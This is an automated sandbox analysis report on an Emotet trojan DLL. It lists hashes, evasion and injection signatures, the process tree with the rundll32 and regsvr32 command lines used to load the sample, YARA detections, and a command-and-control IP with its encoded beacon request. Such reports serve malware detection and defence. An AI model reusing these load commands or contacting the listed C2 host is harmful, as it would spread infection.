Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1V4gPPcQvB.dll

Overview

General Information

Sample Name:1V4gPPcQvB.dll
Analysis ID:626498
MD5:571f80cb1a81eddf1fb399a4cd96582c
SHA1:9e12d3add0890234365af3ea43e94ec9b271aaa1
SHA256:c117963618d01c8c1b37a8dbc31409318e343ae03493569bfa6d66e0ebdf8dbd
Tags:exetrojan
Infos:

Detection

Emotet
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Changes security center settings (notifications, updates, antivirus, firewall)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
IP address seen in connection with other malware
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll64.exe (PID: 5896 cmdline: loaddll64.exe "C:\Users\user\Desktop\1V4gPPcQvB.dll" MD5: 4E8A40CAD6CCC047914E3A7830A2D8AA)
    • cmd.exe (PID: 5904 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\1V4gPPcQvB.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 3404 cmdline: rundll32.exe "C:\Users\user\Desktop\1V4gPPcQvB.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
    • regsvr32.exe (PID: 4572 cmdline: regsvr32.exe /s C:\Users\user\Desktop\1V4gPPcQvB.dll MD5: D78B75FC68247E8A63ACBA846182740E)
      • regsvr32.exe (PID: 6012 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\TvcDyJjJQ\NcAvRfvDRbwLFn.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
    • rundll32.exe (PID: 3748 cmdline: rundll32.exe C:\Users\user\Desktop\1V4gPPcQvB.dll,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 2364 cmdline: rundll32.exe C:\Users\user\Desktop\1V4gPPcQvB.dll,DllUnregisterServer MD5: 73C519F050C20580F8A62C849D49215A)
  • svchost.exe (PID: 2224 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4572 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4732 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4940 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 1332 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 1584 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 3452 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 3820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 5076 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6292 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6332 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6832 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2740 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6168 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000006.00000002.649155251.0000000000760000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000004.00000002.264793383.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000003.00000002.265168643.0000023396DC0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000006.00000002.649306435.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000004.00000002.264939318.0000020701410000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            4.2.rundll32.exe.20701410000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              2.2.regsvr32.exe.22e0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                6.2.regsvr32.exe.760000.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  2.2.regsvr32.exe.22e0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    4.2.rundll32.exe.20701410000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      Click to see the 3 entries
                      No Sigma rule has matched
                      No Snort rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 1V4gPPcQvB.dllVirustotal: Detection: 39%Perma Link
                      Source: https://23.239.0.12/#mWwnAvira URL Cloud: Label: malware
                      Source: https://23.239.0.12/#mWwnVirustotal: Detection: 9%Perma Link
                      Source: unknownHTTPS traffic detected: 23.239.0.12:443 -> 192.168.2.4:49763 version: TLS 1.2
                      Source: 1V4gPPcQvB.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: msacm32.pdb source: regsvr32.exe, 00000006.00000002.648362301.00000000004B5000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: msacm32.pdbGCTL source: regsvr32.exe, 00000006.00000002.648362301.00000000004B5000.00000004.00000010.00020000.00000000.sdmp
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000D26C FindFirstFileW,FindNextFileW,FindClose,6_2_000000018000D26C

                      Networking

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 23.239.0.12 443Jump to behavior
                      Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: hIRJjqHMHdV=nZwxi8WPWIMXNXTCUv3V5ewCiVaqak0UnFrOh9HPxFaBO28go/9+xWRpiaD+OvdLdpaS3KmMe0NROXF7P/v2uFUR2mdZcEYfCsU7esjRj8UoaBpR90xnOAMLNZb4Zf/GkJR+k0zKRYQ4snDyWIl1vlaP/fyz8s1xkPFTUva4UqN6kwBO8dE+yFUfheBRQWksHoH2WbfRu/bRMIQmJ6ipsT+oAAYPWV1JFEYVPpdNR6o=Host: 23.239.0.12Connection: Keep-AliveCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 23.239.0.12 23.239.0.12
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: svchost.exe, 0000001C.00000003.493716426.000001F50975E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO"," equals www.facebook.com (Facebook)
                      Source: svchost.exe, 0000001C.00000003.493716426.000001F50975E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO"," equals www.twitter.com (Twitter)
                      Source: svchost.exe, 0000001C.00000003.493716426.000001F50975E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z||.||8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f||1152921505694830749||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: svchost.exe, 0000001C.00000003.493716426.000001F50975E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z||.||8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f||1152921505694830749||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: svchost.exe, 0000001C.00000003.493716426.000001F50975E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z||.||8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f||1152921505694830749||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: svchost.exe, 0000001C.00000003.493716426.000001F50975E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z||.||8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f||1152921505694830749||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: regsvr32.exe, 00000006.00000002.649046694.0000000000670000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.323483995.0000000000670000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.605035022.000001D2BDC65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.534926379.000001F509722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 00000012.00000002.604912010.000001D2BDC15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: svchost.exe, 0000001C.00000003.513071382.000001F509775000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: svchost.exe, 0000000D.00000002.317375524.00000243CC413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
                      Source: svchost.exe, 0000000B.00000002.649002780.000002577343D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                      Source: svchost.exe, 0000000B.00000002.649002780.000002577343D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.com
                      Source: regsvr32.exe, 00000006.00000002.648685140.0000000000611000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.323873760.0000000000611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://23.239.0.12/
                      Source: regsvr32.exe, 00000006.00000002.648685140.0000000000611000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.323873760.0000000000611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://23.239.0.12/#mWwn
                      Source: svchost.exe, 0000000B.00000002.649002780.000002577343D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
                      Source: svchost.exe, 0000000D.00000003.317075778.00000243CC461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                      Source: svchost.exe, 0000000B.00000002.649002780.000002577343D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 0000000B.00000002.649002780.000002577343D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 0000000D.00000003.317086705.00000243CC45E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000D.00000002.317537582.00000243CC45A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.317096728.00000243CC459000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 0000000D.00000003.317075778.00000243CC461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                      Source: svchost.exe, 0000000D.00000002.317469413.00000243CC43D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                      Source: svchost.exe, 0000000D.00000002.317537582.00000243CC45A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.317096728.00000243CC459000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 0000000D.00000002.317551870.00000243CC46A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.317069787.00000243CC467000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                      Source: svchost.exe, 0000000D.00000003.317075778.00000243CC461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
